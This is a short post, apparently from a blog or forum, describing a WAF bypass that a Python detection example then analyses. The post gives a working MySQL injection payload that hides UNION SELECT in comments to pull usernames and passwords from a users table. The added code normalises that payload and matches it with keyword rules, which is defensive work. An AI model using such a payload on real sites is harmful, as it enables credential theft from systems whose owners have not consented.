So.. apparently this SQL injectable website does not allow user or users keyword. But.. id=user and id=users are allowed. I have no time to determine what WAF rules are applied. All I know is that I don't really know when they will drop a request. I just try something and see if it works.
And then suddenly after randomly mashing my keys to find a working payload, this worked:
'+/*!40000union*/select+/*randomlongstringhehehehehe*/user,password+from/*anotherlongstringhehehehehe*/users%23
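
A detection-side view of the payload above, as an added example that is not part of the original post: MySQL executes the body of a `/*!40000 ... */` comment on servers at or above that version and treats a plain `/* ... */` comment as a token separator, so a filter has to normalise both away before matching keywords. The rule names and patterns are hypothetical and are not the rules of the WAF in the post.

```python
import re
from urllib.parse import unquote_plus

# Payload quoted in the post above, used here as the test input.
PAYLOAD = ("'+/*!40000union*/select+/*randomlongstringhehehehehe*/user,password"
           "+from/*anotherlongstringhehehehehe*/users%23")

# /*!NNNNN body */ : MySQL runs the body on servers >= NNNNN, so keep the body.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# /* ... */ : ordinary comment; the parser treats it as a token separator.
PLAIN = re.compile(r"/\*.*?\*/", re.S)
# "#" or "-- " comments run to the end of the line.
TRAILING = re.compile(r"(?:#|--\s)[^\n]*")

# Hypothetical keyword rules, not the rules of the WAF in the post.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b"),
    "from_users": re.compile(r"\bfrom\s+users?\b"),
}

def decode_only(raw: str) -> str:
    """URL-decode and lowercase, with no SQL-aware normalisation."""
    return unquote_plus(raw).lower()

def normalize(raw: str) -> str:
    """Reduce a parameter value to roughly the token stream MySQL would parse."""
    s = unquote_plus(raw)
    s = VERSIONED.sub(r" \1 ", s)   # unwrap executable comments first
    s = PLAIN.sub(" ", s)           # then drop padding comments
    s = TRAILING.sub(" ", s)        # then the trailing line comment
    return re.sub(r"\s+", " ", s).strip().lower()

def hits(text: str) -> list:
    """Names of the rules that match the given text, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

if __name__ == "__main__":
    print("decoded only:", hits(decode_only(PAYLOAD)))
    print("normalized  :", normalize(PAYLOAD), hits(normalize(PAYLOAD)))
    print("benign value:", hits(normalize("users")))
```

The same rules that miss the decoded-only string match once the comments are unwrapped, while a bare `users` value still passes. Normalised matching is a detection layer only; the injection itself is closed by parameterised queries in the application.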